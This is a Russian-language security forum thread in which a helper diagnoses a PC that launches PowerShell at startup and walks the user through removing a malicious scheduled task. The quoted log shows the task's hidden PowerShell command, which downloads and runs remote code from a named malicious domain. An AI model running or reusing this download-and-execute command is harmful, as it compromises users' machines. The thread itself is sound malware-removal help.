[РЕШЕНО] Powershell пытается запустить переход по вредоносной ссылке

[grammer91]

Добрый день!

 

Проблема в следующем: после запуска системы примерно через 30 секунд запускается и сразу закрывается Powershell, после чего антивирус публикует уведомление, что был заблокирован переход по ссылке. 

Проверку на вирусы запускал дважды, никакие угрозы найти не удалось.

Тест сообщения антивируса:

Цитата

Событие: Остановлен переход на сайт
Пользователь: NEIRODEN\progr
Тип пользователя: Инициатор
Имя приложения: powershell.exe
Путь к приложению: C:\Windows\System32\WindowsPowerShell\v1.0
Компонент: Интернет-защита
Описание результата: Запрещено
Тип: Вредоносная ссылка
Название: https://i.404.pm/2024/11/11/1731305914-7731.jpeg
Точность: Точно
Степень угрозы: Высокая
Тип объекта: Веб-страница
Имя объекта: 1731305914-7731.jpeg
Путь к объекту: https://i.404.pm/2024/11/11
Причина: Облачная защита

Помогите устранить проблему, пожалуйста

CollectionLog-2024.11.14-11.33.zip

Изменено 14 ноября, 2024 пользователем grammer91

[Sandor]

Здравствуйте!

 

"Пофиксите" в HijackThis только следующее (некоторые строки могут отсутствовать):

O4 - Autorun.inf: D:\autorun.inf - (unknown target)
O22 - Tasks: SecurityHealthSystray - C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "iex (irm 'prolitartest.xyz/0x55/3')" (sign: 'Microsoft')
O22 - Tasks_Migrated: SecurityHealthSystray - C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "iex (irm 'prolitartest.xyz/0x55/3')" (sign: 'Microsoft')

 

Перезагрузите компьютер и соберите новый CollectionLog.

 

[grammer91]

Пока после перезагрузки попыток перехода не было

CollectionLog-2024.11.14-12.57.zip

[Sandor]

Да, вредоносная задача, которая была еще до обновления системы, удалена.

 

В завершение:

• Загрузите SecurityCheck by glax24 & Severnyj, сохраните утилиту на Рабочем столе и извлеките из архива.
• Запустите из меню по щелчку правой кнопки мыши Запустить от имени администратора
• Если увидите предупреждение от вашего фаервола или SmartScreen относительно программы SecurityCheck, не блокируйте ее работу
• Дождитесь окончания сканирования, откроется лог в блокноте с именем SecurityCheck.txt
• Если Вы закрыли Блокнот, то найти этот файл можно в корне системного диска в папке с именем SecurityCheck, например C:\SecurityCheck\SecurityCheck.txt
• Прикрепите этот файл к своему следующему сообщению.

 

[grammer91]

SecurityCheck.txt

[Sandor]

Исправьте по возможности:

 

Microsoft Office профессиональный плюс 2013 - ru-ru v.15.0.5467.1000 Данная программа больше не поддерживается разработчиком. Обновите Microsoft Office до последней версии или используйте Office Online или LibreOffice
FileZilla 3.67.0 v.3.67.0 Внимание! Скачать обновления
µTorrent v.3.6.0.47162 Внимание! Клиент сети P2P с рекламным модулем!.
Yandex (All Users) v.24.10.2.705 Внимание! Скачать обновления
^Проверьте обновления через меню Дополнительно - О браузере Yandex!^
 

---------------------------- [ UnwantedApps ] -----------------------------
CCleaner v.6.30 Внимание! Подозрение на демо-версию антивредоносной программы, программу для обновления драйверов, программу-оптимизатор или программу очистки реестра. Рекомендуется деинсталляция и сканирование ПК с помощью Malwarebytes Anti-Malware. Возможно Вы стали жертвой обмана или социальной инженерии. Компьютерные эксперты не рекомендуют использовать такие программы.
Кнопка "Яндекс" на панели задач v.2.2.0.53 Внимание! Приложение распространяется в рамках партнерских программ и сборников-бандлов. Рекомендуется деинсталляция. Возможно Вы стали жертвой обмана или социальной инженерии.
 

Читайте Рекомендации после удаления вредоносного ПО

[grammer91]

понял, спасибо за помощь, проблема решена

[Sandor]

Мы были рады Вам помочь! Надеемся, что Вы остались довольны результатом. На нашем форуме также можно получить компьютерную помощь, помощь по продуктам "Лаборатории Касперкого", обсудить технологии и технику, заказать эксклюзивную сувенирную продукцию "Лаборатории Касперского" бесплатно! Форумчане ежегодно путешествуют. В числе приглашенных в Турцию, Армению, Сочи, Камбоджу можете стать и Вы! Будем рады видеть Вас в наших рядах! Всегда ваш, клуб "Лаборатории Касперского".